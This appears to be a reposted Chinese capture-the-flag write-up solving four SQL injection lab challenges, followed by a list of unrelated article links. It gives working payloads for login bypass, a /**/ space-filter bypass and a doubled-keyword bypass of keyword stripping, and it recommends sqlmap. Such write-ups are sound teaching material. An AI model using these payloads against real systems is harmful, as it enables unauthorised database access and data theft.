实验吧 web题--注入类
来源:互联网 发布:阿尔法复制软件 编辑:程序博客网 时间:2024/06/07 18:45
1、登陆一下好吗
SQL语句:select * from user where username='用户名' and password='密码'
尝试1'='1并没有得到flag,因为表中没有username=1。于是通过构造1'='0进行注入,并且得到flag。执行的语句为select * from user where username='1'='0' and password='1'='0'
2、简单的sql注入3
直接用sqlmap就ok
3、简单的sql注入2
经过注入尝试,程序将空格注释掉了,在sql语句中,可以用/**/代替空格
'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
4、简单的sql注入
输入'union select flag from flag where '1'='1,得到返回结果:'flag flag '1'='1''。可以判断将关键字进行了注释。
输入'unionunion selectselect flag fromfrom flag wherewhere '1'='1,得到返回结果:'unionselectflag fromflag where'1'='1''。可以判断将空格进行了注释
输入两遍空格和关键字:?id=1' unionunion selectselect flag fromfrom flag wherewhere '1'='1,得到flag
阅读全文
0 0
- 实验吧 web题--注入类
- 实验吧ctf-web题:简单的sql注入
- 实验吧web之简单的sql注入1
- 实验吧WEB--简单的sql注入之3
- 实验吧 web题--代码审计类
- [基本实验] Web漏洞演示系统中的SQL注入漏洞
- 实验吧web几题writeup
- 实验吧 web 拐弯抹角
- 实验吧 web forms
- 实验吧-WEB篇
- 实验吧CTF-web
- 实验吧-web-wp
- 实验吧WEB--拐弯抹角
- 实验吧_简单的sql注入
- 实验吧 简单的sql注入
- 实验吧简单的SQL注入
- WEB注入
- 实验吧 web Once More
- MySQL中的锁(表锁、行锁)
- 网络编程
- Android判断是否连接网络或者是否打开了GPS
- 哪位明星会是你心目中的“旗袍”代言人?
- C++检测输入是否是整数
- 实验吧 web题--注入类
- Android RecyclerView 打造带悬浮效果的联系人
- mysql如何进行以,分割的字符串的拆分
- 【Junit】Junit使用教程(二)
- c标签
- 从订单中心开始,聊聊「多KEY」类业务数据库水平切分架构实践
- 手游性能优化之深入理解Texture Compression
- 恶意代码分析实战 Lab 5-1 习题笔记
- link与@import